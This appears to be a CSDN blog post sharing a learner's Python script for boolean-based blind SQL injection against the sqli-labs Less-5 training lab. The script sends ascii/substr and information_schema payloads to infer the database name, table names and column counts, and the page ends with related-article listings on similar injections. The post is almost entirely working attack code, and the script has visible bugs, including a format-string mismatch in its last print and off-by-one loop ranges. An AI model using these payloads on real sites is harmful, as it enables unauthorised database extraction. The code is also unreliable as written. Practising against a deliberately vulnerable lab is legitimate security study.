这是对付sqli-labs less5 的盲注python脚本(不懂,写了好久)

最新推荐文章于 2022-05-11 20:19:11 发布
最新推荐文章于 2022-05-11 20:19:11 发布
阅读量772 收藏 1
点赞数 1
分类专栏: sqli-labs 文章标签: sqli-labs less 5(python脚本)
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45106794/article/details/102800277
版权 
import requests
db_length=1
db_url=''
db_place=1
db_name=''
db_ascii=1
print("猜解数据库长度")
url="http://127.0.0.1/sqli-labs-master/less-5/?id=1'"
for db_length in range(1,100):
    db_url=url+'and %d=(select length(database()))--+'%(db_length)
    r=requests.get(db_url)
    if 'You are in...........' in r.text:
        print('[!] '+db_url)
        print('猜解结束')
        break
    else:
        print('[x] '+db_url)
print('数据库名长度:%d'%(db_length))

print("-----------------------")
print('猜解数据库名称')
db_urlname=url+'and %d=(ascii(substr(database(),%d,1)))--+'%(db_ascii,db_place)
for db_place in range(1,db_length+1):
    for db_ascii in range(0,127):
        db_urlname=url+'and %d=(ascii(substr(database(),%d,1)))--+'%(db_ascii,db_place)
        print(db_urlname)
        r = requests.get(db_urlname)
        if 'You are in...........' in r.text:
            db_name=db_name+chr(db_ascii)
            print('[!]'+db_name)
            break
        else:
            continue
print('数据库的名称是:'+db_name)

print("------------------------")
print('猜解表的个数')
tb_urlname=''
tb_url=''
tb_number=1
for tb_number in range(1,10):
    tb_url=url+'and %d=(select count(table_name) from information_schema.tables where table_schema=database())--+'%(tb_number)
    r = requests.get(tb_url)
    if'You are in...........' in r.text:
        print('[!]'+tb_url)
        break
    else:
        print('[x]'+tb_url)
print('表的数目是=%d'%(tb_number))

print("-------------------------")
print("猜解每个表的长度")
tb_lengthurl=''
tb_namelength=1
tb_num1=0
tb_array=[]
for tb_num1 in range(0,tb_number+1):
    for tb_namelength in range(1,20):
        tb_lengthurl = url + 'and %d=length((select concat(table_name)from information_schema.tables where table_schema=database() limit %d,1))--+' % (tb_namelength,tb_num1)
        r = requests.get(tb_lengthurl)
        if 'You are in...........' in r.text:
            tb_array.append(tb_namelength)
            print('[!] %d'%(tb_namelength)+ '>>%s'%(tb_lengthurl))
            tb_namelength=0
            break
        else:
            print('[x]' + tb_lengthurl)
            continue
for i in range(0,len(tb_array)):
    print("第%d个表的长度:%d"%(i+1,tb_array[i]))

print("--------------------------")
print("猜解每个表的名字")
tb_name=''
tb_nameurl=''
tb_num2=0
tb_length=1
tb_nameasci=1
tb_arrayname=[]
for tb_num2 in range(0,tb_number):
    for tb_length in range(1,tb_array[tb_num2]):
        for tb_nameasci in range(95,128):
            tb_nameurl=url+'and %d=(ascii(substr((select concat(table_name)from information_schema.tables where table_schema=database() limit %d,1),%d,1)))--+'%(tb_nameasci,tb_num2,tb_length)
            r = requests.get(tb_nameurl)
            if'You are in...........' in r.text:
                tb_name=tb_name+chr(tb_nameasci)
                print('[!]'+tb_nameurl)
                print(tb_name)
                break
            else:
                print('[x]'+tb_nameurl)
                continue
    tb_arrayname.append(tb_name)
for i in range(0,tb_number):
    print('第%d个表的名字:%s' % ((i+1),tb_arrayname[i]))

print("----------------------------")
print("猜解每个表中列的个数")
cb_url=''
cb_sum=0
cb_array=[]

for tb_num2 in range(1,tb_number):
    for i in range(1,10):
        cb_url=url+"and %d=(select count(column_name)from information_schema.columns where table_name='%s')--+"%(i,tb_arrayname[tb_num2])
        r=requests.get(cb_url)
        if 'You are in...........' in r.text:
            cb_array.append(i)
            print('[!]'+cb_url)
            break
        else:
            continue
for tb_num2 in range(1,tb_number):
    print('%s表的列数是:'%(tb_arrayname[tb_num2-1],cb_array[tb_num2-1]))

print('-----------------------------')
好好学习不好吗?
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
sqli-labs lesson8 python 脚本源代码(存在小bug)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈(在结果的格式化输出那有个小bug,用户名和密码没有正确对应,修改后的代码我又上传了,抱歉,,,)
sqli-labs/Less-5/双查询注入&布尔盲注
m0_75178803的博客
04-20 199
数据库名database为security。可知是基于 1' 的注入。4.查询当前数据库下的所有表名。5.查询当前表下的所有列名。6.查询指定列名下的数据。经典的双查询注入语句。
sqli-labs-less-5布尔盲注+错误注入(超详细,小白专属)
yzcn
10-26 899
Less-5 判断注入点: http://127.0.0.1/sqli-labs-master/Less-5/?id=1 正常显示,但是与前四关不同,这里只有一句话:you are in, http://127.0.0.1/sqli-labs-master/Less-5/?id=1’ 显示错误,错误:’‘1’’ LIMIT 0,1’,多了一个单引号, http://127.0.0.1/sqli-labs-master/Less-5/?id=1’–+ 将单引号注释后,显示正常,继续返回一句话you are
SQLi LABS Less-5 报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-26 1万+
sqlilabs 第五关,sqli-labes less-5,sqlilabs less5
sqli-labs第5关布尔盲注pyhton脚本
weixin_30564901的博客
04-03 283
import requests import os #此函数先判断数据库长度 def length(url,str): num = 1 while True: str_num = '%d' %num len_url = url + "' and (select length(database()) = " + str_num +")--+" response...
sqli-labs Less-5(布尔盲注
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
01-31 585
前几篇sql注入文章 sqli-labs Less-1(联合注入、字符型注入) sqli-labs Less-2(联合注入、整形型注入) sqli-labs Less-3(联合注入、字符型注入) sqli-labs Less-4(联合注入、字符型注入) sqli-labs Less-5(利用extractvalue进行报错注入) sqli-labs Less-5(双注入) 布尔盲注其实就是构造一个SQL语句,当语句成立时,页面会返回特点的标识,语句不成立是返回其他,或无数据。因此我们可以构造一个判断语句,利
sqli-labs第五关(配合布尔盲注以及python脚本))
加油~
05-11 1111
进入第五关,正常显示如下:![image.png](https://img-blog.csdnimg.cn/img_convert/fb62cfcc13c424b26cdbc08d0250f9eb.png#clientId=udf7edcfc-d50d-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=864&id=u753066f5&margin=[object Object]&name=
Sqli-labs--less-5
沐目的博客
04-08 4424
sqli-labs-master/Less-5/ 字符型,报错注入 首先 ?id=1’ 报错。让后用双引号,回显正常。再使用单引号+%23,回显正常,基本可以确定是单引号字符型。但是发现使用平常的 union select ,没有任何反应。 所以这道题需要一个新的知识点,刚学sql注入的同学,可能会有一点崩溃。有两种方法,叫做报错注入,其实有三种,但是我只会两种。 一、 报错注入了解一下:(报错...
sqli-libs——less 5(盲注
Fly_鹏程万里
05-08 1850
Less-5由于这一关涉及到盲注的内容,所以我们还是想来看看源代码吧:可以看到,如果运行返回结果正确的时候只返回you  are in...,不会返回数据库当中的信息了,所以我们不能之前所采用的在less-4之前的方法了。从这里开始就要进行盲注了!利用left(a,b)进行测试测试数据库版本利用left(database(),1)进行尝试http://192.168.11.136/sqli-lab...
Sqli-labs之Less-5的补充
m0_46315342的博客
06-04 236
原文链接:http://www.52bug.cn/hkjs/4649.html 这里我会对原文进行部分修改: 0x00 概述 渗透的时候总会首先测试注入,sql注入可以说是web漏洞界的Boss了,稳居owasp第一位,普通的直接回显数据的注入现在几乎绝迹了,绝大多数都是盲注了,此文是盲注...
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注,POST数据盲注。 资料参考:https://blog.csdn.net/Kevinhanser/article/details/81215985
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
结合手工注入编一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编一个SQL盲注脚本——以SQLi-Labs less16为例.doc
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
sqli-labs 靶场知识总结
qq_45106794的博客
11-01 1060
sqli-labs 靶场知识总结 由于我的电脑最近用新系统的时候,还不适应,所以有些通过笔记不见了,/(ㄒoㄒ)/~~ 我直接总结吧(有些从注入天书摘抄的,(__) 嘻嘻……) 基于从服务器接收到的响应 ▲基于错误的 SQL 注入 ▲联合查询的类型 ▲堆查询注射 ▲SQL 盲注 •基于布尔 SQL 盲注 •基于时间的 SQL 盲注 •基于报错的 SQL 盲注 基于如何处理输入的 SQL 查询(数...
sqli-labs-less17
qq_45106794的博客
10-23 815
#sqli-labs-less17 在对uname这一项进行注入,发现不管是’ " ’ ) " )等,都显示一样,说明无法进行注入,也说明源代码可能有对uname进行检查,再试试passwd这一项 成功报错,说明passwd这一项可以进行注入 'or (select 1 from (select count(),concat(floor(rand(0)2),database())as x f...
sqli-labs less50-53
qq_45106794的博客
11-01 713
#sqli-labs less 50-53 是order by 和stacked injection 的结合 这里以less50为主 http://192.168.56.101/sqli-labs-master/Less-50/?sort=1;create table less50 like users
sqli-labs less
最新发布
07-28
抱歉,我无法回答关于sqli-labs less的问题。 #### 引用[.reference_title] - *1* *2* *3* [sqli-labs教程——Less 1-10](https://blog.csdn.net/qq_25649867/article/details/111020393)[target="_blank" data-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值